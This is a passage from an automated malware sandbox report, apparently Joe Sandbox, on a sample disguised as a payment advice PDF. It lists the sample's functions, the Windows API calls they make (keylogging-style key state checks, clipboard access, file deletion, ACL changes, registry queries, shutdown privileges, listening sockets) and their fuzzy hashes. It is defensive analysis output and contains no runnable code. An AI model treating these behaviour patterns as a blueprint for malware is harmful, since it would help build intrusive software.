                                                              • _wcscmp.LIBCMT ref: 008AF1D3
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 008AF1E5
                                                              • SetCurrentDirectoryW.KERNEL32(008F8920), ref: 008AF203
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 008AF20D
                                                              • FindClose.KERNEL32(00000000), ref: 008AF21A
                                                              • FindClose.KERNEL32(00000000), ref: 008AF22C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                              • String ID: *.*
                                                              • API String ID: 1824444939-438819550
                                                              • Opcode ID: c06980c0f1edc0b593ce25605b08ef3dc8af41c2d02e85727e97a6861e0763e2
                                                              • Instruction ID: a16f0a753b28d981380b6c32bb34b22cb5ea36e89ecf9192a21ea3d7e90ccc98
                                                              • Opcode Fuzzy Hash: c06980c0f1edc0b593ce25605b08ef3dc8af41c2d02e85727e97a6861e0763e2
                                                              • Instruction Fuzzy Hash: 7D319136500219AAEB10AAB4EC49FEE77BDFF46360F100175EA10E35A2DB74DE45CA64
                                                              Function 008AA1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 008AA20F
                                                              • __swprintf.LIBCMT ref: 008AA231
                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 008AA26E
                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 008AA293
                                                              • _memset.LIBCMT ref: 008AA2B2
                                                              • _wcsncpy.LIBCMT ref: 008AA2EE
                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 008AA323
                                                              • CloseHandle.KERNEL32(00000000), ref: 008AA32E
                                                              • RemoveDirectoryW.KERNEL32(?), ref: 008AA337
                                                              • CloseHandle.KERNEL32(00000000), ref: 008AA341
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                              • String ID: :$\$\??\%s
                                                              • API String ID: 2733774712-3457252023
                                                              • Opcode ID: 7ed8cd4bfbcfb6c1810182a0b2de6a86eaae7bc050261d782a3b33215f6c1880
                                                              • Instruction ID: 0135c985014062ee0729d22e1ede9b482671c3c0c60b976d46844b734adeeefe
                                                              • Opcode Fuzzy Hash: 7ed8cd4bfbcfb6c1810182a0b2de6a86eaae7bc050261d782a3b33215f6c1880
                                                              • Instruction Fuzzy Hash: DA31B0B1900109ABEB219FA4DC49FEB37BDFF89741F1040B6F608D2661EB709644CB25
                                                              Function 00897CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00898202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0089821E
                                                                • Part of subcall function 00898202: GetLastError.KERNEL32(?,00897CE2,?,?,?), ref: 00898228
                                                                • Part of subcall function 00898202: GetProcessHeap.KERNEL32(00000008,?,?,00897CE2,?,?,?), ref: 00898237
                                                                • Part of subcall function 00898202: HeapAlloc.KERNEL32(00000000,?,00897CE2,?,?,?), ref: 0089823E
                                                                • Part of subcall function 00898202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00898255
                                                                • Part of subcall function 0089829F: GetProcessHeap.KERNEL32(00000008,00897CF8,00000000,00000000,?,00897CF8,?), ref: 008982AB
                                                                • Part of subcall function 0089829F: HeapAlloc.KERNEL32(00000000,?,00897CF8,?), ref: 008982B2
                                                                • Part of subcall function 0089829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00897CF8,?), ref: 008982C3
                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00897D13
                                                              • _memset.LIBCMT ref: 00897D28
                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00897D47
                                                              • GetLengthSid.ADVAPI32(?), ref: 00897D58
                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00897D95
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00897DB1
                                                              • GetLengthSid.ADVAPI32(?), ref: 00897DCE
                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00897DDD
                                                              • HeapAlloc.KERNEL32(00000000), ref: 00897DE4
                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00897E05
                                                              • CopySid.ADVAPI32(00000000), ref: 00897E0C
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00897E3D
                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00897E63
                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00897E77
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                              • String ID:
                                                              • API String ID: 3996160137-0
                                                              • Opcode ID: 0057255c887a8a400b7cdfae321d58643f0284b75a296a1361e8327becc03e08
                                                              • Instruction ID: f93262a85cc59cdb0facfb8ea958f7d55f20fbbea15a7041e2478e0eeea1522b
                                                              • Opcode Fuzzy Hash: 0057255c887a8a400b7cdfae321d58643f0284b75a296a1361e8327becc03e08
                                                              • Instruction Fuzzy Hash: 87611B7191450AEFEF01AFA4DC45EEEBB7AFF04700F088169F915E6291DB359A05CB60
                                                              Function 008566E1 Relevance: 18.4, Strings: 14, Instructions: 889COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                              • API String ID: 0-4052911093
                                                              • Opcode ID: 6a8b090b0e2a7e23e28475f31ae2d8931b87435b3b11cf31891e76f0afd96146
                                                              • Instruction ID: 91b73ae3022453e8770a925ed33b3ab1c6d3084176adcb41e3e2f5a6d84826f2
                                                              • Opcode Fuzzy Hash: 6a8b090b0e2a7e23e28475f31ae2d8931b87435b3b11cf31891e76f0afd96146
                                                              • Instruction Fuzzy Hash: 6572A175E0421ADBDF14DF58C8807AEB7B5FF48315F54816AE949EB280EB309E85CB90
                                                              Function 008A001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetKeyboardState.USER32(?), ref: 008A0097
                                                              • SetKeyboardState.USER32(?), ref: 008A0102
                                                              • GetAsyncKeyState.USER32(000000A0), ref: 008A0122
                                                              • GetKeyState.USER32(000000A0), ref: 008A0139
                                                              • GetAsyncKeyState.USER32(000000A1), ref: 008A0168
                                                              • GetKeyState.USER32(000000A1), ref: 008A0179
                                                              • GetAsyncKeyState.USER32(00000011), ref: 008A01A5
                                                              • GetKeyState.USER32(00000011), ref: 008A01B3
                                                              • GetAsyncKeyState.USER32(00000012), ref: 008A01DC
                                                              • GetKeyState.USER32(00000012), ref: 008A01EA
                                                              • GetAsyncKeyState.USER32(0000005B), ref: 008A0213
                                                              • GetKeyState.USER32(0000005B), ref: 008A0221
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: State$Async$Keyboard
                                                              • String ID:
                                                              • API String ID: 541375521-0
                                                              • Opcode ID: 31178ea658400016c0a9b93ad5d761ddda8c8d17788a4062e522f781b2195986
                                                              • Instruction ID: 624d1c7590eb1c0cc6c978be53fcc5a00ebd747678c3e6c8f4c84e2567c9adc1
                                                              • Opcode Fuzzy Hash: 31178ea658400016c0a9b93ad5d761ddda8c8d17788a4062e522f781b2195986
                                                              • Instruction Fuzzy Hash: 1651CB2090478819FF35DBA488547EABFB4FF13380F08459995C19B9C3DAA49B8CCF62
                                                              Function 008C03DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 008C0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008BFDAD,?,?), ref: 008C0E31
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008C04AC
                                                                • Part of subcall function 00849837: __itow.LIBCMT ref: 00849862
                                                                • Part of subcall function 00849837: __swprintf.LIBCMT ref: 008498AC
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 008C054B
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 008C05E3
                                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 008C0822
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 008C082F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 1240663315-0
                                                              • Opcode ID: f6f9e6f91db0446c22e8daf441c3ef5c2723c8782c906908d3e43b15fbcf91de
                                                              • Instruction ID: 8fecccb990ecb643476570593bd2db2ae18a88a76c79a6171bba835b6d811804
                                                              • Opcode Fuzzy Hash: f6f9e6f91db0446c22e8daf441c3ef5c2723c8782c906908d3e43b15fbcf91de
                                                              • Instruction Fuzzy Hash: 19E13B71204214EFCB14DF28C891E2ABBF5FF89754B04856DF94ADB262DA31E905CF92
                                                              Function 008B4164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                              • String ID:
                                                              • API String ID: 1737998785-0
                                                              • Opcode ID: 5994cf3c91f2514377373456cb7c1c01f2413b87dc85bdd8dcb3e2494a113d83
                                                              • Instruction ID: ea5012f7d886fcb89268465c4a2d83a937299ab3dc8e1393b6eaba81cd22083a
                                                              • Opcode Fuzzy Hash: 5994cf3c91f2514377373456cb7c1c01f2413b87dc85bdd8dcb3e2494a113d83
                                                              • Instruction Fuzzy Hash: D62171356002159FEB10AF68DC09F6A7BB9FF54711F158025FA45DB3A2DB30AC01CB55
                                                              Function 008A37EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00844750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00844743,?,?,008437AE,?), ref: 00844770
                                                                • Part of subcall function 008A4A31: GetFileAttributesW.KERNEL32(?,008A370B), ref: 008A4A32
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 008A38A3
                                                              • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 008A394B
                                                              • MoveFileW.KERNEL32(?,?), ref: 008A395E
                                                              • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 008A397B
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 008A399D
                                                              • FindClose.KERNEL32(00000000,?,?,?,?), ref: 008A39B9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                              • String ID: \*.*
                                                              • API String ID: 4002782344-1173974218
                                                              • Opcode ID: fcf1986f1479e0326979b9a06c6ae75e70fc4252572e279101af1747b246f2da
                                                              • Instruction ID: dd2d4194288d0c5551aa7fe46aa50f50c3101d14440213697048708b73f994e5
                                                              • Opcode Fuzzy Hash: fcf1986f1479e0326979b9a06c6ae75e70fc4252572e279101af1747b246f2da
                                                              • Instruction Fuzzy Hash: 7251703180514CAADF01EBA4D992DEEBB79FF16300F640069F406F6592EB316F09CB52
                                                              Function 008AF3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00847DE1: _memmove.LIBCMT ref: 00847E22
                                                              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 008AF440
                                                              • Sleep.KERNEL32(0000000A), ref: 008AF470
                                                              • _wcscmp.LIBCMT ref: 008AF484
                                                              • _wcscmp.LIBCMT ref: 008AF49F
                                                              • FindNextFileW.KERNEL32(?,?), ref: 008AF53D
                                                              • FindClose.KERNEL32(00000000), ref: 008AF553
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                              • String ID: *.*
                                                              • API String ID: 713712311-438819550
                                                              • Opcode ID: c56f85916c09a3668b3efb622d4fbd5d5446817aa88e9ffc808a97ddd83dbeed
                                                              • Instruction ID: 7de922a256a12bfc656dc37d3cff8d45f3ab59c7e7e898eb7e414e36fcf5526d
                                                              • Opcode Fuzzy Hash: c56f85916c09a3668b3efb622d4fbd5d5446817aa88e9ffc808a97ddd83dbeed
                                                              • Instruction Fuzzy Hash: C0414B71D0021EABEF14DFA8DC59AEEBBB4FF05310F144566E915E2292EB309E44CB51
                                                              Function 00855760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _memmove
                                                              • String ID:
                                                              • API String ID: 4104443479-0
                                                              • Opcode ID: 0339ab63a20667a75a85a58354f971d2d3b4aadbd82ede3d3590751988a6055c
                                                              • Instruction ID: 5c989bcebe0253a1b0a0497b6003a180cab43f740801a099da5d383a0b9ad894
                                                              • Opcode Fuzzy Hash: 0339ab63a20667a75a85a58354f971d2d3b4aadbd82ede3d3590751988a6055c
                                                              • Instruction Fuzzy Hash: B112AA70A00A09EFCF04DFA8D991AAEB7F5FF48300F144529E846E7251EB36AD24CB55
                                                              Function 008A3B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00844750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00844743,?,?,008437AE,?), ref: 00844770
                                                                • Part of subcall function 008A4A31: GetFileAttributesW.KERNEL32(?,008A370B), ref: 008A4A32
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 008A3B89
                                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 008A3BD9
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 008A3BEA
                                                              • FindClose.KERNEL32(00000000), ref: 008A3C01
                                                              • FindClose.KERNEL32(00000000), ref: 008A3C0A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                              • String ID: \*.*
                                                              • API String ID: 2649000838-1173974218
                                                              • Opcode ID: 4194bd1be73baf006b96e2cf2a94c6691c4d4b9b6e733d010db5a08f8b3e3814
                                                              • Instruction ID: 644014805ede1d7334fe3a20a6d3f063b9474efef212ff57b3485aff87dcd8a5
                                                              • Opcode Fuzzy Hash: 4194bd1be73baf006b96e2cf2a94c6691c4d4b9b6e733d010db5a08f8b3e3814
                                                              • Instruction Fuzzy Hash: C7316F310083899BD301EF28D895DAFBBA9FE92314F404D2DF4D5D2192EB359A09C763
                                                              Function 008A51BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 008987E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0089882B
                                                                • Part of subcall function 008987E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00898858
                                                                • Part of subcall function 008987E1: GetLastError.KERNEL32 ref: 00898865
                                                              • ExitWindowsEx.USER32(?,00000000), ref: 008A51F9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                              • String ID: $@$SeShutdownPrivilege
                                                              • API String ID: 2234035333-194228
                                                              • Opcode ID: f53858cde8f356d233297a80a0b5b0c4615cc2bc8a8856a960e548ac3d8ba490
                                                              • Instruction ID: d30f63fa91f3ca6556c7bec9193ed1df9474576b0e4139a4c792776b498f17e9
                                                              • Opcode Fuzzy Hash: f53858cde8f356d233297a80a0b5b0c4615cc2bc8a8856a960e548ac3d8ba490
                                                              • Instruction Fuzzy Hash: 8D012B317916156BF72862789C8AFBB7298FB07754F240431FA23E28D2DA611C808590
                                                              Function 008B6283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 008B62DC
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 008B62EB
                                                              • bind.WSOCK32(00000000,?,00000010), ref: 008B6307
                                                              • listen.WSOCK32(00000000,00000005), ref: 008B6316
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 008B6330
                                                              • closesocket.WSOCK32(00000000,00000000), ref: 008B6344
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                                              • String ID:
                                                              • API String ID: 1279440585-0
                                                              • Opcode ID: ca4393113848827d2f9b7af2fc162b4e15d2ca2844bb3621b5e72a67c96b2e71
                                                              • Instruction ID: 448a499363b79471420cf90d97c531d2394a02893f0d9c03da3c4b56aec9324c
                                                              • Opcode Fuzzy Hash: ca4393113848827d2f9b7af2fc162b4e15d2ca2844bb3621b5e72a67c96b2e71
                                                              • Instruction Fuzzy Hash: E4219E316002089FDB10EF68D845EAEB7F9FF48720F144169E956E7392D774AD11CB52
                                                              Function 00855520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00860DB6: std::exception::exception.LIBCMT ref: 00860DEC
                                                                • Part of subcall function 00860DB6: __CxxThrowException@8.LIBCMT ref: 00860E01
                                                              • _memmove.LIBCMT ref: 00890258
                                                              • _memmove.LIBCMT ref: 0089036D
                                                              • _memmove.LIBCMT ref: 00890414
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                              • String ID:
                                                              • API String ID: 1300846289-0
